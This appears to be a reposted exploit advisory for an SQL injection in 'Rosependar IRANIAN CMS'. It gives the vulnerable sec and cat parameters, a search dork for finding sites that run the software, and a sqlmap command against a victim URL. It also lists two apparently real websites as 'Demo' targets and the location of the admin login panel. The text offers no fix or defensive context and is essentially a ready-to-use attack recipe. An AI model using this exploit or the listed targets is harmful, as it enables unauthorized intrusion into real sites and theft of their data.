CMS SQL Injection with SQLMAP

Rianda ID
Februari 27, 2020
# Exploit Title: Rosependar IRANIAN CMS SQL injection
# Date: 2020-02-26
# Exploit Author: S I R M A X
# Vendor Homepage: https://www.rosependar.ir/
# Dork: intext:"Powered By RoseCms" inurl:sec=
# Version: All Version
# Tested on: win,linux
[SQL injection]     

[+] (Vulnerability = Sql injection ) Storm Security Team of IRan
[+] parameter = sec & cat
=======================================================================

[+] SQLMAP
python sqlma.py -u https://victim.com/[PATH]&sec=
Demo:
[+] http://www.filand.ir/?page=major/41&mode=branch&sec=[SQL]
[+] http://www.kaci.ir/?page=major/8&tp=1&cat=[SQL]

 [#] The admin and user login panel is one

admin panel => victim.com/index.php?page=major/19